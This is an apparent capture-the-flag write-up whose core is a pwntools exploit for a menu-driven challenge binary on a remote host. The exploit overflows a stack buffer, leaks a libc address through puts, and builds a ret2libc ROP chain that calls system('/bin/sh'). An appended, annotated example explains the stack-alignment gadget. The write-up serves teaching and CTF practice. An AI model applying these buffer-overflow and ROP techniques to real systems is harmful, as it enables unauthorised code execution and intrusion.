Problem source
Protections
Problem analysis and payload
The problem-analysis text file survived, but the IDA database file was lost, sorry ㅠㅠㅠ
You will understand it quickly if you look at the exploit code.
```python
from pwn import *

# context.log_level = 'critical'
context.log_level = 'debug'

# p = process("./chall")
e = ELF("./chall")
puts_plt = e.plt['puts']
puts_got = e.got['puts']
pr = 0x0000000000400c03  # pop rdi; ret;

dns, port = "34.121.211.139", 2222
p = remote(dns, port)

for i in range(13):
    # loop-body indentation was not preserved on the page; only this line is assumed to be inside the loop
    p.sendlineafter(b"Your Choice > ", b"1")
p.sendlineafter(b"Green Signal, write whaterver you want to: ", b"4")
p.sendlineafter(b"Your Choice > ", b"2")
p.sendlineafter(b"Enter the vehicle id: ", b"0")
p.sendlineafter(b"Yellow Signal, write for your vehicle:", b"1024")
p.sendlineafter(b"Your Choice > ", b"3")
p.sendlineafter(b"Enter the vehicle id: ", b"1")
p.sendlineafter(b"Do you have any comments?\n", b"1")

# leak puts@got through puts@plt, then return to menu 3
pay = b"A" * 0x40          # fill the 0x40-byte comment buffer
pay += b"B" * 8            # saved rbp
pay += p64(pr)             # pop rdi; ret
pay += p64(puts_got)       # rdi = puts@got
pay += p64(puts_plt)       # puts(puts@got) prints the libc address of puts
pay += p64(0x4008e7)       # menu 3: return into the menu for a second overflow
p.sendlineafter(b"Please enter your comments\n", pay)
leak = u64(p.recvline()[:-1].ljust(8, b"\x00"))

# libc offsets as used in this write-up
base = leak - 0x80aa0
system = base + 0x4f550
sh_addr = base + 0x1b3e1a
print("puts_got leak=" + hex(leak))

# menu 3 again and execute the system function
pay2 = b"A" * 0x40
pay2 += b"B" * 8
pay2 += p64(pr)
pay2 += p64(sh_addr)
pay2 += p64(0x000000000040061e)  # ret: keeps the stack 16-byte aligned before system
pay2 += p64(system)
p.sendlineafter(b"Enter the vehicle id: ", b"1")
p.sendlineafter(b"Do you have any comments?\n", b"1")
p.sendlineafter(b"Please enter your comments\n", pay2)
p.interactive()
```
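As an added illustration that is not part of the original write-up, the snippet below models how rsp moves through the second chain (pop rdi; ret, then "/bin/sh", then ret, then system) to show what the lone `ret` gadget at 0x40061e is for: the x86-64 SysV ABI expects rsp % 16 == 8 on function entry, and glibc's system() faults on a misaligned stack. The gadget addresses are the write-up's; `SYSTEM`, `SH_ADDR` and the starting rsp values are constructed for the demonstration.

```python
# Added example, not from the original post. Gadget addresses come from the
# write-up; SYSTEM, SH_ADDR and the rsp values below are constructed.

POP_RDI_RET = 0x400c03    # pop rdi; ret   (from the write-up)
RET = 0x40061e            # ret            (from the write-up)
SYSTEM = 0x7f0000000000   # constructed stand-in for the libc system address
SH_ADDR = 0x7f00001b3e1a  # constructed stand-in for the "/bin/sh" address

# data qwords each gadget pops before executing its own ret
POPS = {POP_RDI_RET: 1, RET: 0}


def rsp_at_system_entry(chain, rsp_at_ret, target=SYSTEM):
    """rsp when control reaches `target`, given `chain` (the qwords that
    follow the saved rbp) and rsp at the overflowed function's ret."""
    rsp, i = rsp_at_ret, 0
    while True:
        value = chain[i]
        rsp += 8                # the ret that transfers control pops this qword
        if value == target:
            return rsp
        pops = POPS[value]      # argument qwords the gadget consumes
        rsp += 8 * pops
        i += 1 + pops


def entry_is_aligned(chain, rsp_at_ret):
    # SysV ABI: rsp is 16-byte aligned before a call, so rsp % 16 == 8 on entry
    return rsp_at_system_entry(chain, rsp_at_ret) % 16 == 8


WITHOUT_RET = [POP_RDI_RET, SH_ADDR, SYSTEM]
WITH_RET = [POP_RDI_RET, SH_ADDR, RET, SYSTEM]

if __name__ == "__main__":
    # constructed stack states: one needs the ret gadget, the other does not
    for rsp in (0x7ffc00001000, 0x7ffc00001008):
        print(hex(rsp),
              "without ret:", entry_is_aligned(WITHOUT_RET, rsp),
              "with ret:", entry_is_aligned(WITH_RET, rsp))
```

Whether the extra `ret` is needed depends on rsp at the moment of the overflowed function's ret, which is why it is usually found by trial against the target binary rather than derived in advance.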